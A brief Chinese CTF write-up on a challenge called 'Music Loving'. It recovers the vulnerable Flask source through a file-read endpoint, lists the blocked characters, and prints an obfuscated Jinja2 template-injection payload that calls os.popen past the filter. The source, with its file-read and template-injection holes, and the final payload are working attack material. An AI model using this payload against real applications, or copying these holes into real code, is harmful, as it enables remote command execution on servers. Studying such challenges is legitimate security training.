Music Loving

First Post:

Last Update:

源码里提示robots有东西(开始没注意到,直接进歌名栏里ssti,怎么都没反应),User-agent: *
Disallow: ./appbak,禁止访问/appbak,于是在网上搜怎么绕过robots协议,未果,遂被提示”啊嘞嘞,没有这个歌词文件哦,换一个歌名吧”,歌词。。文件!用文件包含得/appbak源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
from flask import Flask, request, render_template,render_template_string, redirect, url_for, session
import time
import os

app = Flask(__name__)
app.secret_key = 'Ciallo~(∠・ω <)⌒★'
FILTER_KEYWORDS = ['.','/','Ciallo~(∠・ω <)⌒★']
TIME_LIMIT = 1
def contains_forbidden_keywords(complaint):
for keyword in FILTER_KEYWORDS:
if keyword.lower() in complaint:
return True
return False

@app.route('/', methods=['GET'])
def index():
session['user'] = 'test'
return render_template('index.html')

@app.route('/mod', methods=['GET', 'POST'])
def complaint_form():
if request.method == 'POST':
current_dir = os.path.dirname(os.path.abspath(__file__))
con = request.form.get('mod')
if contains_forbidden_keywords(con):
return render_template('forbidden.html')
conn = os.path.join(current_dir, con)
if not os.path.exists(conn):
return render_template('None.html')
with open(conn, 'r', encoding='utf-8') as file:
content = file.read()
return render_template('contents.html', content=content)
return render_template('submit.html')

@app.route('/test', methods=['GET', 'POST'])
def shell():
if session.get('user') != 'test':
return render_template('Auth.html')
cmd = request.args.get('cmd', '试一试')
if request.method == 'POST':
css_url = url_for('static', filename='style.css')
command = request.form.get('cmd')
if contains_forbidden_keywords(command):
return render_template('forbidden.html')
return render_template_string(f'''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Loving Music</title>
<link rel="stylesheet" href="{css_url}">
<link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap" rel="stylesheet">
</head>
<body>
<div class="container">
<h1>Loving Music</h1>
<p class="emoji">🎵</p>
<p>{command}</p>
<a href="#" class="button">点击我</a>
</div>
</body>
</html>
''', command=command,css_url=css_url)
return render_template('shell.html', command=cmd)
@app.route('/robots.txt', methods=['GET', 'POST'])
def robots():
return render_template('robots.txt')

if __name__ == '__main__':
app.run(host="0.0.0.0", port=8449, debug=True)

进入/test,一通测试过滤了

1
"%","__",".","glo","read","/","0","1","2","3","4","5","6","7","8","9","*","+","-"

喂给脚本,得flag

1
{{lipsum['_'~'_'~'g''lobals'~'_'~'_']['_''_builtins_''_']['_''_import_''_']('os')['popen'](x|center(dict(xxxxxxxxx=x)|join|length)|replace(x|center|first,lipsum()|urlencode|first~'c')|format((dict(xxxxxxxxx=x)|join|length~dict(xxxxxxxxx=x)|join|length)|int,(dict(xxxxxxxxx=x)|join|length~dict(xxxxxxx=x)|join|length)|int,((x,)|count~(x,)|count~dict(xxxxxx=x)|join|length)|int,((x,x,x)|count~(x,x)|count)|int,(dict(xxxx=x)|join|length~dict(xxxxxxx=x)|join|length)|int,((x,)|count~{}|int~(x,x)|count)|int,((x,)|count~{}|int~dict(xxxxxxxx=x)|join|length)|int,(dict(xxxxxxxxx=x)|join|length~dict(xxxxxxx=x)|join|length)|int,((x,)|count~{}|int~(x,x,x)|count)|int))['r''ead']()}}